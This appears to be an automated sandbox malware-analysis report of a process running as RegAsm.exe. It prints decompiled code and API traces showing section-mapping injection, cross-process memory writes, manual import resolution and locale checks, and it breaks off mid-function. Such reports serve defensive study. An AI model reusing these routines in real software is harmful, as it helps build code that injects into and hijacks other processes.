API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: b6405e8059bd4b88782ab1188ecdb797cdafa9df9e5a25068ff499a3cf894d60
Instruction ID: 4db332f60456314578424ad0b3df9bf38d64c9172e3a4d06bda0954ea80853d4
Opcode Fuzzy Hash: b6405e8059bd4b88782ab1188ecdb797cdafa9df9e5a25068ff499a3cf894d60
Instruction Fuzzy Hash: 6FF024323014246AD770A6AA8C48EEF7BBCDFC4344FC000A1FAD5D3000EA35EA4587A0

Uniqueness

Uniqueness Score: -1.00%

Function 0040182F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040182F(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401ABC(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401838
0x0040183f
0x00401840
0x00401841
0x00401842
0x00401843
0x00401854
0x00401858
0x0040186c
0x0040186f
0x00401872
0x00401879
0x0040187c
0x00401883
0x00401886
0x00401889
0x0040188c
0x00401891
0x004018cc
0x00401893
0x00401896
0x0040189c
0x004018a1
0x004018a5
0x004018c3
0x004018a7
0x004018ae
0x004018bc
0x004018bc
0x004018a5
0x004018d4

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 0040188C

Part of subcall function 00401ABC: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004018A1,00000002,00000000,?,?,00000000,?,?,004018A1,?), ref: 00401AE9

memset.NTDLL ref: 004018AE

Strings

@, xrefs: 0040187C

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 277851e4c3a750915726f8dfe4229ce992eb14250305b82bde1a7ffcea199f85
Instruction ID: cfef47e18cb264e0516f494c4b540d59e064707ec9234cfc32f3da402eab71cc
Opcode Fuzzy Hash: 277851e4c3a750915726f8dfe4229ce992eb14250305b82bde1a7ffcea199f85
Instruction Fuzzy Hash: 0F210BB6D00209AFCB11DFA9C8849DEFBF9EB48354F10843AE515F3250D734AA498B64

Uniqueness

Uniqueness Score: -1.00%

Function 03F0696A, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000318), ref: 03F0698F
NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 03F069AB

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

Part of subcall function 03F08C10: GetProcAddress.KERNEL32(?,00000000), ref: 03F08C39
Part of subcall function 03F08C10: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03F069EC,00000000,00000000,00000028,00000100), ref: 03F08C5B

StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 03F06B15

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
String ID:
API String ID: 3547194813-0
Opcode ID: a646ca043e3d8a4653eaa9729a0d3a4797a35d129a242be7a45019e05c672da1
Instruction ID: b4e7f6856a5cd47498376ae1bac7785c24ecd1be0a72ce144c048b46aa816cc2
Opcode Fuzzy Hash: a646ca043e3d8a4653eaa9729a0d3a4797a35d129a242be7a45019e05c672da1
Instruction Fuzzy Hash: AB613DB5A0020AAFDF14DF99C880BAEBBB4FF08304F144569E915E7381D734E964DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F076E3, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F076F7
GetProcAddress.KERNEL32(?), ref: 03F0771F
NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 03F0773D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressInformationProcProcess64QueryWow64memset
String ID:
API String ID: 2968673968-0
Opcode ID: 4eb45598608703810286253831153156f3ce600c5ed659aa77f1aa4438f42d29
Instruction ID: 4c48972baea9a6bf2aae60650299dd6e69b390fd8befa63a06893c1ba7d95f01
Opcode Fuzzy Hash: 4eb45598608703810286253831153156f3ce600c5ed659aa77f1aa4438f42d29
Instruction Fuzzy Hash: 55117039A0021DEFDB20EB98DC55FAD77B8EB54740F054064ED04EB284D770E909DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0317C, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(03F04884,00000000,00000000,03F04884,00003000,00000040), ref: 03F031AD
RtlNtStatusToDosError.NTDLL(00000000), ref: 03F031B4
SetLastError.KERNEL32(00000000), ref: 03F031BB

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Error$AllocateLastMemoryStatusVirtual
String ID:
API String ID: 722216270-0
Opcode ID: 344dfb45f436b898eff1346ad8fb3c8e40117b92fced3786c218697238f1f24c
Instruction ID: 592e5a7d1999e2ceb70dbb4a4d3585ca58a1f330e4a9b1940751b57a10518c9c
Opcode Fuzzy Hash: 344dfb45f436b898eff1346ad8fb3c8e40117b92fced3786c218697238f1f24c
Instruction Fuzzy Hash: BEF0FE75921309FBEB15DB95D91AB9EB7BCAB14315F104048A600E60C4EBB8AB04DB64

Uniqueness

Uniqueness Score: -1.00%

Function 03F12931, Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,00000FFF,03F04926,00000000,?,03F04926,00000FFF,00000000,00000000,00000318,00000020,?,00010003,00000FFF), ref: 03F1294F
RtlNtStatusToDosError.NTDLL(C0000002), ref: 03F1295E
SetLastError.KERNEL32(00000000,?,03F04926,00000FFF,00000000,00000000,00000318,00000020,?,00010003,00000FFF,?,00000318,00000008), ref: 03F12965

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryStatusVirtualWrite
String ID:
API String ID: 1089604434-0
Opcode ID: 5629c182dbed323151f7e7ac437c5f2230ad3fc19a3117bacb89e8320c219805
Instruction ID: b8f11b1590a0f99d7d2c4183ebdf9f88bfe2da6a24c0133d1a832560399f654b
Opcode Fuzzy Hash: 5629c182dbed323151f7e7ac437c5f2230ad3fc19a3117bacb89e8320c219805
Instruction Fuzzy Hash: 3FE04F3620021EFBCF12AEE8AC18D9B7B69BF18791B444411BE01D6125D735D872ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00401AFE, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00401AFE(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x00401b02
0x00401b13
0x00401b1b
0x00401b1d
0x00401b30
0x00401b30
0x00401b3a

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,00401C13,?,00000000,?,00000000,00000000,?,?,?,004014B3), ref: 00401B13
GetSystemDefaultUILanguage.KERNEL32(?,?,00401C13,?,00000000,?,00000000,00000000,?,?,?,004014B3), ref: 00401B1D
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,00401C13,?,00000000,?,00000000,00000000,?,?,?,004014B3), ref: 00401B30

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 52c6f5a58242be4be1142285715e8e35bf8ac5838e11812d740f66bd91eb1ace
Instruction ID: 75fb8ea5ce51871fe508bf16274b224096c76d65a8a0e79dad5ffd91f30446f6
Opcode Fuzzy Hash: 52c6f5a58242be4be1142285715e8e35bf8ac5838e11812d740f66bd91eb1ace
Instruction Fuzzy Hash: FAE04FA4640209B6E710EB91DD06FBA76BCAB4070AF500059BB51F60D0E7B8AF04A679

Uniqueness

Uniqueness Score: -1.00%

Function 004012E6, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004012E6(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x404180;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x004012e6
0x004012ef
0x004012f4
0x004012fa
0x00401303
0x00401309
0x0040130b
0x0040130e
0x00401313
0x0040131a
0x0040131a
0x0040131e
0x00401326
0x00401329
0x00000000
0x00000000
0x0040132f
0x00401339
0x0040133b
0x0040133e
0x00401341
0x00401345
0x0040134d
0x0040134f
0x00401352
0x004013ba
0x004013ba
0x004013be
0x00000000
0x00000000
0x00401357
0x0040135d
0x0040135f
0x00401372
0x00401375
0x00401375
0x00401375
0x00401379
0x00401361
0x00401361
0x00401369
0x0040136b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040136b
0x00401359
0x00401359
0x0040136d
0x0040136d
0x0040136d
0x0040137c
0x0040137f
0x00401381
0x00401388
0x00401383
0x00401383
0x00401383
0x00401390
0x00401396
0x00401398
0x004013c8
0x0040139a
0x0040139a
0x0040139d
0x0040139f
0x004013a7
0x004013a7
0x004013ac
0x004013ae
0x004013b5
0x004013b7
0x004013b7
0x004013b7
0x00000000
0x004013b7
0x00000000
0x00401398
0x00401347
0x00401349
0x0040134b
0x00000000
0x00000000
0x0040134b
0x004013cb
0x004013cb
0x004013d2
0x004013d7
0x00000000
0x00000000
0x004013dd
0x004013e8
0x00000000
0x004013e8
0x004013df
0x004013df
0x004013e5
0x00000000
0x004013e5
0x00401313
0x004013e9
0x004013ee

APIs

LoadLibraryA.KERNELBASE(00000002,00000002,00000000,?,?), ref: 0040131E
GetProcAddress.KERNEL32(?,00000000), ref: 00401390

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: f4b7ff60539d3a96460d441c4a8b3070c5c513a7139f2fe033805b60c161cc32
Instruction ID: 2f7b473b5a3bdb691faa6f7d4530a69deac4cfc85e0689c41dd715b9d9ea931b
Opcode Fuzzy Hash: f4b7ff60539d3a96460d441c4a8b3070c5c513a7139f2fe033805b60c161cc32
Instruction Fuzzy Hash: C4311871A01205DBEB14CF99C880AAEB7F8BF04355B24407ADC41EB7A4E778EA41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 03F1CEED, Relevance: 3.1, APIs: 2, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL(?,000F001F,?,3D03F261,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 03F1CF4A

Part of subcall function 03F0D317: NtMapViewOfSection.NTDLL(00000000,000000FF,03F1CF61,00000000,00000000,03F1CF61,00000000,00000002,00000000,?,?,00000000,03F1CF61,000000FF,00000000), ref: 03F0D345

memset.NTDLL ref: 03F1CF6E

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID:
API String ID: 2533685722-0
Opcode ID: aa51625719063effdb6928b6baf209f0cca2f7014c7b30aa9d85afc9d6da689e
Instruction ID: d961aa85c01293eabd27ccba3878e3795ba47b11126a95593190b5661e41708b
Opcode Fuzzy Hash: aa51625719063effdb6928b6baf209f0cca2f7014c7b30aa9d85afc9d6da689e
Instruction Fuzzy Hash: 84214AB6D0020DAFCB10DFA9C8809EEFBB9EF08354F104529E615F7250D730AA549BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A5D85, Relevance: 3.1, APIs: 2, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E010A5D85(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E010A60A0(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x010a5d8e
0x010a5d95
0x010a5d96
0x010a5d97
0x010a5d98
0x010a5d99
0x010a5daa
0x010a5dae
0x010a5dc2
0x010a5dc5
0x010a5dc8
0x010a5dcf
0x010a5dd2
0x010a5dd9
0x010a5ddc
0x010a5ddf
0x010a5de2
0x010a5de7
0x010a5e22
0x010a5de9
0x010a5dec
0x010a5df2
0x010a5df7
0x010a5dfb
0x010a5e19
0x010a5dfd
0x010a5e04
0x010a5e12
0x010a5e12
0x010a5dfb
0x010a5e2a

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,010A2BF2), ref: 010A5DE2

Part of subcall function 010A60A0: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,010A5DF7,00000002,00000000,?,?,00000000,?,?,010A5DF7,00000000), ref: 010A60CD

memset.NTDLL ref: 010A5E04

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID:
API String ID: 2533685722-0
Opcode ID: f2138472706cdebc23fcefdf0e69a832db84b78fe32d80847e4847ef8beb6927
Instruction ID: 1be3a48e20469bab42aa913e8170877f6b729b190d849037a300fc499e0b40a8
Opcode Fuzzy Hash: f2138472706cdebc23fcefdf0e69a832db84b78fe32d80847e4847ef8beb6927
Instruction Fuzzy Hash: B321F9B5D00209AFCB11DFE9C8849DFFBF9FB48354F508569E655F7210D6319A448B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F08C10, Relevance: 3.0, APIs: 2, Instructions: 35librarynativeloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000000), ref: 03F08C39
NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,03F069EC,00000000,00000000,00000028,00000100), ref: 03F08C5B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressMemory64ProcReadVirtualWow64
String ID:
API String ID: 752694512-0
Opcode ID: 6caf92ed9cec0eea552c7241204a04b8aad59643427255cc57a914c15e261298
Instruction ID: 25c437ec3504944b39fec6e5da0bba4ab7902e6b1ed6be5ea33cdcacd1d8944f
Opcode Fuzzy Hash: 6caf92ed9cec0eea552c7241204a04b8aad59643427255cc57a914c15e261298
Instruction Fuzzy Hash: 19F03776500209FFCB22DF99DC50C5EBBBAEBA4240B148129F500C2220D371A951EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00401ABC, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401ABC(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00401ace
0x00401ad4
0x00401ae2
0x00401ae9
0x00401aee
0x00401af4
0x00000000
0x00401af5
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,004018A1,00000002,00000000,?,?,00000000,?,?,004018A1,?), ref: 00401AE9

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: a8e5c5609049af5dd12c51856b2571328d087d8000fcbab120e033e118b65095
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: A4F012B590020CBFDB119FA5CC85C9FBBBDEB44354B10493AB152E10A0D6749E089B60

Uniqueness

Uniqueness Score: -1.00%

Function 010A60A0, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E010A60A0(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x010a60b2
0x010a60b8
0x010a60c6
0x010a60cd
0x010a60d2
0x010a60d8
0x00000000
0x010a60d9
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,010A5DF7,00000002,00000000,?,?,00000000,?,?,010A5DF7,00000000), ref: 010A60CD

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: b28bd66371f6ccf5495df57539d059f3c2d9581fa055eb68276107ae12bb2df3
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: D5F030B690020CFFEB119FE5CC85CAFBBBDEB44394B504A39F652E1090D6319E489B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0D317, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,03F1CF61,00000000,00000000,03F1CF61,00000000,00000002,00000000,?,?,00000000,03F1CF61,000000FF,00000000), ref: 03F0D345

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction ID: dfb55e5824b5fd1c9d84ba65bec74b24ef43ef16743b351827f99d989e565c83
Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
Instruction Fuzzy Hash: 36F012B690020CFFEB119FE5CC85C9FBBBDEB44344B00883AF542D1050D2319E589B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0D274, Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,03F2C300), ref: 03F0D28B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 43054b9c1694012cce81d4206dccd63348a6cad277fc2cbc8fcce920c15b9a32
Instruction ID: 434f2e18887bac1f8dff06b9fecf7a5d2fd8a0f4ee1609c357bcbe50dfdc87c1
Opcode Fuzzy Hash: 43054b9c1694012cce81d4206dccd63348a6cad277fc2cbc8fcce920c15b9a32
Instruction Fuzzy Hash: AFF05E3170111ADBCB20DED9D889D9BFBA8EB157607044155F900DB2A5D370E945DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 010A2C37, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E010A2C37(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x10aa290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x10aa018; // 0x6b01647b
					asm("bswap eax");
					_t32 =  *0x10aa014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x10aa010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x10aa00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0x10aa2d4; // 0x235d5a8
